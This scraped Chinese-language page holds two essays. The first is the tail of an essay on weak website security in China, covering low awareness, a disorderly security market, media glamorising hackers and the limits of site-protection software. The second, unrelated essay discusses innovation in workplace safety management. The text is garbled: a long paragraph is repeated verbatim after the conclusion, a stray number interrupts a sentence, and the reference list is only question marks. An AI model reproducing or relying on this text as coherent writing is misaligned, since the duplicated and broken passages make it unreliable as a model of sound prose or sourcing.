80%的網站存在安全隱患,20%的網站有嚴重的安全問題。一位“黑客”甚至說如果他敲鍵的速度足夠快的話,一天可以黑掉100個網站!這多少可以反映中國網絡安全所存在的問題。
網絡信息安全研究的人員認為這首先是沒有安全意識。北京中聯綠盟公司副總經理高永安說,一些網站認為他們的公司還小,不會成為黑客攻擊的目標,即使被黑也不會有什么損失。廣州京九公司總經理萬濤認為,信息安全來自三個方面:技術、管理和學習,加強信息安全不能光做技術,還要重視內部管理和人員培養。而一些網絡安全公司的不負責態度,也據估計不利于中國信息安全的提高。據分析,中國信息安全市場容量將達到1000億元,目前從事信息安全服務的公司已超過一百家,但是市場卻相當混亂。有些安全公司為了獲得業務,甚至刻意地尋找甚至制造一些網絡公司的系統漏洞,然后以此為籌碼與網絡公司談判。一些媒體的片面報道,也可能產生不利的影響。據最近在廣州進行的一次調查顯示,4%的小學生希望成為黑客。媒體報道黑客事件時有兩個傾向,一是玄化,將信息安全和黑客說得神乎其神;二是美化,將黑客塑造成英雄和偶像來崇拜。因此媒體必須加強引導,不要盲目地炒作黑客行為,更不能鼓吹黑客的破壞性。
可見,國內網站安全存在必然隱患的問題必須得以正視。盡管網站保護軟件能進一步提高系統的安全,仍然存在一些缺陷。首先這些保護軟件都是針對靜態頁面而設計,而現在動態頁面占據的范圍越來越大,盡管本地監測方式可以檢測腳本文件,但對腳本文件使用的數據庫卻無能為力。
另外,有些攻擊并不是針對頁面文件進行的,前不久泛濫成災的”Red Code"就是使用修改IIS服務的一個動態庫來達到攻擊頁面的目的。另一個方面,網站保護軟件本身會增加WWW服務器的負載,在WWW服務器負載本身已經很重的情況下,一定好仔細規劃好使用方案
結束語
本文側重在網站安全方面來談,討論了網站常用的保護方法,詳細地分析比較了專用網站保護軟件采用的各種技術實現和優缺點,并指出了其缺陷。安全雖不是使用某個工具或某些工具就可以解決的,但使用這些工具能幫助提高安全性,減少安全風險。只有更好 29 的保障網站的安全,才能便于網站的管理。
網絡信息安全研究的人員認為這首先是沒有安全意識。北京中聯綠盟公司副總經理高永安說,一些網站認為他們的公司還小,不會成為黑客攻擊的目標,即使被黑也不會有什么損失。廣州京九公司總經理萬濤認為,信息安全來自三個方面:技術、管理和學習,加強信息安全不能光做技術,還要重視內部管理和人員培養。而一些網絡安全公司的不負責態度,也據估計不利于中國信息安全的提高。據分析,中國信息安全市場容量將達到1000億元,目前從事信息安全服務的公司已超過一百家,但是市場卻相當混亂。有些安全公司為了獲得業務,甚至刻意地尋找甚至制造一些網絡公司的系統漏洞,然后以此為籌碼與網絡公司談判。一些媒體的片面報道,也可能產生不利的影響。據最近在廣州進行的一次調查顯示,4%的小學生希望成為黑客。媒體報道黑客事件時有兩個傾向,一是玄化,將信息安全和黑客說得神乎其神;二是美化,將黑客塑造成英雄和偶像來崇拜。因此媒體必須加強引導,不要盲目地炒作黑客行為,更不能鼓吹黑客的破壞性。
參考文獻
主要參考文獻: ??????
第五篇:淺析安全管理與創新
淺析安全管理與創新
創新、創造是企業發展的主題,也是前進的源動力;一個企業沒有了創新就像汪洋中的一條船,失去了動力在原地打轉是十分危險的;而安全又是企業生存發展的基礎,企業的創新、創造,也就意味著安全管理的手段、模式、技術等方面不能一成不變,也必須緊跟上時代發展的步伐。
1.宣傳手段創新.現在一提到安全宣傳,大家首先想到的是掛橫幅、看錄像、辦黑板報展評等等,這些宣傳手段是最基本的、傳統的、行之有效的。但是,隨著社會的發展,人員素質的提高,科技的進步,特別是年輕員工的加入,這些傳統的宣傳手段已不能滿足安全信息的傳播、傳遞;人們需要更新、更快的宣傳載體,渴求更新鮮、更豐富的宣傳內涵的加入。現在電腦、智能手機已經非常普及,網絡、WIFI信號也到處覆蓋,安全宣傳完全可以借助微信、QQ、電子郵件等工具給員工發送有教育意義的安全短信、視頻,或者生日問候、安全提醒等 ;成本少,但宣傳面卻很廣、很快,效果迥異。
另外,常見的安全宣傳口號總是“安全第一,預防為主”、“安全責任重于泰山”這幾句,如果能夠增加一些如“愛妻愛子愛家庭,出了事故等于零”、“見了違章嚴批評,道是無情卻有情”、“與其事后痛苦流涕,不如事前遵章守紀”等更人性化的口號,肯定會引起更多員工的關注和共鳴。
2.管理模式創新.安全檢查一直是安全管理的基本方法;什么專項檢查、綜合檢查、節前節后檢查等等;這些是必須的,也是必要的;但這只是從管理層角度出發的一種行為,是單向的,被查員工往往有抵觸情緒;怎么樣能讓員工自己主動地去自查自糾存在的隱患和違章,從被動安全轉變為主動安全呢?俗話說“群眾的眼睛是雪亮的”,能否對員工設立隱患舉報獎勵機制,調動員工查隱患的積極性;對確認的隱患,給予舉報者獎勵,并及時整改;讓隱患和違章象過街老鼠一樣,人人喊打,使其失去存在的土壤。
目前公司的監控視頻只安裝在保安室,對現場安全生產的監督意義不大;能否讓部門、基地工廠的負責人、安全管理員也安裝監控軟件,打開電腦就能看到重點部位、關鍵工序的作業畫面,有利于及時發現生產異常和違章行為,充分發揮視頻監控的作用,彌補現場檢查的不足,轉變等別人匯報安全問題的模式,這在現在是不難做到的事情;對于8小時之外、加班時間的監管,同樣也可以借鑒使用此方法。
3.安全技術創新.安全是生產力!安全工作是科學性的體現;本質安全,是安全技術的目標追求!在安全工作中,科技含量越高,安全嚴謹性就越大;企業安全除了嚴格管理更需要技術創新;企業要發展就必須不斷地加大對新設備的投入、新技術的研發;淘汰安全隱患大、生產效率低的設備和工藝,全面推動企業轉型升級,改善工作環境,降低員工勞動強度,努力給員工創造一個安全、穩定的工作環境;有了安全技術創新,企業才有免疫力,才能不斷增強競爭力,才能在市場上始終處于領先地位!
安全管理工作要與時俱進,不斷創新,最大限度地消除事故隱患,減少事故發生,保障人身安全、財產安全。
安全管理將伴隨著公司的創新、創造,永續美好的未來!
點擊咨詢 